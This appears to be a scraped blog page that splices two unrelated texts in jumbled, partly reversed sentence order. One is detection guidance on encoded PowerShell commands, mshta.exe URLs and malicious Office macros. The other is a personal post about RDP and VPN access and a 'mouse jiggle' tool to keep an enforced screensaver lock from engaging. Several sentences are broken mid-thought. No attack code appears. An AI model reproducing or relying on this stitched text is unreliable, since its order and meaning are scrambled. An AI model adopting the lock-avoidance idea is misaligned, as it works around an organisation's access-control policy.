Review the firewall and web proxy logs from this endpoint to identify any malware retrieval from remote systems. A malicious actor could pass commands to PowerShell obfuscated or encoded using compression tools, such as Base64 or gzip. Review the command passed to PowerShell to determine if it is malicious activity. If necessary, rebuild the host from a known, good source and have the user change their password. Review the URL passed to ‘mshta.exe’ to identify if it is from a trusted source., Review the firewall and web proxy logs from this endpoint to identify any malware retrieval from remote systems. Malicious actors use phishing emails to send malicious documents. Other methods to execute malicious code in an Office document include using Dynamic Data Exchange objects or exploiting software vulnerabilities. Macros run commands using built-in Windows utilities to download malware and compromise the system. These malicious documents leverage macros, which are small Visual Basic for Applications (VBA) scripts embedded inside of Microsoft Office documents, such as Word, PowerPoint, and Excel. But this happens also in Windows clients, and if you're logged into the box via console.With Windows, however, there's a little program we have as part of an internal suite of packages that sends a fake "mouse jiggle" to any RDP session you have open.Is there anything like this for Linux? I am using Ubuntu, because it makes Linux snobs mad, and I like the lazy, worry-free Compiz setup.This detection identifies suspicious processes spawned by Microsoft Office applications, which could indicate that a malicious actor is using a malicious document. Why disconnecting the tsclient and the VPN "resets" this, we have no idea, as so we're not 100% convinced this is what's going on. What we think is happening is the one of the monitoring software processes pops up a dialog box that steals focus, and so it wants you to hit "Go away" before it allows you to do anything else in Windows. Not only that, but sometimes you have to disconnect the vpn connection, then reconnect, reconnect tsclient, and THEN the desktop will come up with a prompt. So you have to disconnect from the tsclient. Like the desktop wallpaper will redraw, but that's it. Yeah, a pisser, but I could problem is that there's a 50% chance that the login prompt won't come back. Well, I *could,* but then *everyone* would have the settings fixed in this group, and that would make the boss a saaaad panda.So in essence, I have to jiggle my mouse every 15 minutes or else the screen saver kicks in, and I have to type in my password to get my desktop back. The AD has all users at this "safe" level to have screensavers pop on at 15 minutes. In essence, I have to have these graphs and alert systems up, and they only allow access from this remote desktop.I do have administrator access to this box, but not as the user I log into to get some of this software working (which authenticates not only by the remote desktop's IP, but the AD login). It's an XP pro box where I have to be on the desktop because it had proprietary monitoring clients and it's on an access list that is otherwise restricted from our VPN. For the most part, these work great, and crash far less than when I used Windows clients.One server is annoying, though. So, when I work from home, I use Kvpnc and tscleint (which I think is a front end to rdesktop, I am not sure) to connect to various Windows systems at work.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |